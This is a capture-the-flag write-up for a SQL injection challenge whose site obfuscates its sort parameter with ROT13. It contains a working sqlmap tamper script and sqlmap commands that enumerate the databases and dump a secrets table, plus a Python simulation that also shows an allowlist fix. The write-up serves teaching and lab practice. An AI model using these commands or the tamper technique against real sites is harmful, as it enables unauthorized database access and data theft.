CrySyS Novice Group - Sorting Encrypted Fruits writeup (2)

This writeup was cross-posted from balazsrostas.me. Author: Balázs Rostás.

This task was given as homework in the CrySyS Novice Group. It was under the “Shop of Quality Lime (and other fruits)” group and was worth 100 points (second level).

Description: Alright, I think we got it right this time. Our new protection is based on an encryption technique that is easy to implement, and believed to be unbreakable (at least by someone who has never heard about cryptography before). This encryption layer should be enough to protect us from normal attackers.

This task is the next level after the first Sorting Fruits. If you haven't solved that one, take a look at it before reading on.

So, everything is pretty similar, except that now when you click on a category the value of the order parameter no longer matches the column name. For example, if you click on 'price' you will see this link in the address bar:

(Let's say that our vulnerable site's address was again http://someaddress.com)

http://someaddress.com/?order=cevpr

Appending an apostrophe to the value of the order parameter produces the same SQL warning as before, so the query is still injectable; the only difference is that the input is obfuscated somehow before it reaches the query.

It is not too hard to realize that the "encryption" they used is ROT13, a special case of the Caesar cipher which replaces each letter with the letter 13 positions after it in the alphabet. Because the basic Latin alphabet has 26 letters, ROT13 is its own inverse: applying it twice gives back the original text. Two details make the attack easy: ROT13 only touches the 26 ASCII letters, so digits, quotes, spaces, parentheses and the comment markers in a payload pass through unchanged, and it preserves case, so SQL keywords come out exactly as we wrote them. So what we need to do is apply ROT13 to our payload; when the server applies it again it becomes the intended injection and not gibberish.

I used sqlmap again to solve this problem. Everything is very similar to the first version, except that this time we need a tamper script. Tamper scripts are small Python modules that sqlmap loads with --tamper; each one exposes a tamper() function that is called on every injection payload, so it can transform or obfuscate the payload before it is sent to the server.

To use the script easily with sqlmap we put it in the tamper directory, which is located next to sqlmap.py (the --tamper option also accepts a path to the file). I've written the following pretty simple tamper script that will do the job for us (I saved it as rot13.py). Note that str.encode('rot13') only works on Python 2; on Python 3, which current sqlmap runs on, the codecs module has to be used instead, and the function has to tolerate an empty payload, as sqlmap's own tamper scripts do:

# Needed imports
import codecs

from lib.core.enums import PRIORITY

# Define the order in which this tamper script is applied relative to
# other tamper scripts given on the command line
__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def tamper(payload, **kwargs):
    '''
    Applies ROT13 to the payload.

    sqlmap only passes the injected part of the parameter here; the original
    parameter value is prepended untouched, so it must already be ROT13'd on
    the command line.

    >>> tamper("' AND 1=1 -- ")
    "' NAQ 1=1 -- "
    '''

    # Python 3: 'rot13' is not a text encoding, codecs.encode() must be used.
    # ROT13 leaves digits, quotes, spaces and punctuation alone, so the SQL
    # structure of the payload survives; only the letters are rotated.
    return codecs.encode(payload, "rot_13") if payload else payload

Now we run sqlmap with this tamper script. Note that the base value of the parameter is the ROT13 version of 'id' ('vq'): sqlmap applies the tamper function only to the injection payload, not to the original parameter value, so we have to encode that part ourselves or the server would decode it to gibberish:

python sqlmap.py -u "http://someaddress.com/?order=vq" --tamper=rot13 --dbs --technique="B"
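To make the two ROT13 layers and the reason for the 'vq' base value concrete, here is an added, self-contained Python example (my code, not part of the original writeup or of sqlmap). It reimplements the tamper function without sqlmap, builds the parameter the way sqlmap puts it on the wire (untouched base value plus tampered payload), and simulates the server side as the challenge describes it. The PHP source of the challenge is not on the page, so vulnerable_order_by() is an assumed approximation of it; the column names, the injection string and the allowlist in hardened_order_by() are constructed for the example and go slightly beyond the writeup by showing what the fix would look like.

```python
import codecs

# Constructed sample data: the base value sqlmap injects into and a
# boolean-blind probe of the kind sqlmap sends (assumed shape, not
# sqlmap's exact payload string).
ORIGINAL_VALUE = "id"
INJECTION = "' AND 1=1 -- "

# Assumed allowlist of sortable columns for the hardened server.
ALLOWED_COLUMNS = ("id", "name", "price")


def rot13(text):
    """ROT13 over the 26 ASCII letters only.

    Digits, quotes, spaces and SQL punctuation pass through unchanged and
    case is preserved, which is why an injection survives the encoding.
    Applying it twice is the identity.
    """
    return codecs.encode(text, "rot_13")


def tamper(payload, **kwargs):
    """Same contract as a sqlmap tamper function.

    sqlmap passes only the injection string here (it prepends the original
    parameter value itself) and may pass None, which must be returned as-is.
    """
    return rot13(payload) if payload else payload


def build_order_param(original_value, injection):
    """The value that actually goes on the wire.

    The tamper function never sees original_value, so the tester has to
    supply it already ROT13'd; that is why the writeup uses ?order=vq.
    """
    return rot13(original_value) + tamper(injection)


def vulnerable_order_by(order_param):
    """Server side as the challenge describes it (assumed approximation):
    ROT13 the parameter and concatenate it straight into the query."""
    column = rot13(order_param)
    return "SELECT * FROM products ORDER BY " + column


def hardened_order_by(order_param):
    """Decode first, then validate the decoded value against an allowlist.

    The obfuscation layer contributes nothing to security; checking the
    decoded column name against known columns is what stops the injection.
    """
    column = rot13(order_param)
    if column not in ALLOWED_COLUMNS:
        raise ValueError("invalid order column: %r" % column)
    return "SELECT * FROM products ORDER BY " + column


if __name__ == "__main__":
    wire = build_order_param(ORIGINAL_VALUE, INJECTION)
    print("sent:    ", wire)
    print("executed:", vulnerable_order_by(wire))
    try:
        hardened_order_by(wire)
    except ValueError as err:
        print("hardened:", err)
```

Running it shows the parameter leaving as vq' NAQ 1=1 -- and the vulnerable server executing ORDER BY id' AND 1=1 -- , exactly the query the untampered payload would have produced in the first level, while the hardened version rejects it after decoding.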

This gives us the same databases:

available databases [4]:  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] test

Then we list the tables in the test database:

python sqlmap.py -u "http://someaddress.com/?order=vq" --technique="B" --tamper=rot13 -D test --tables

We get the same tables again:

+----------+  
| products |  
| secrets  |  
+----------+

And dumping the data of the secrets table we get our flag:

python sqlmap.py -u "http://someaddress.com/?order=vq" --technique="B" --tamper=rot13 -D test -T secrets --dump

+-----------------------------------------+
| secret                                  |
+-----------------------------------------+
| OUR_PHP_USES_ROT13_FOR_MAXIMUM_SECURITY |
+-----------------------------------------+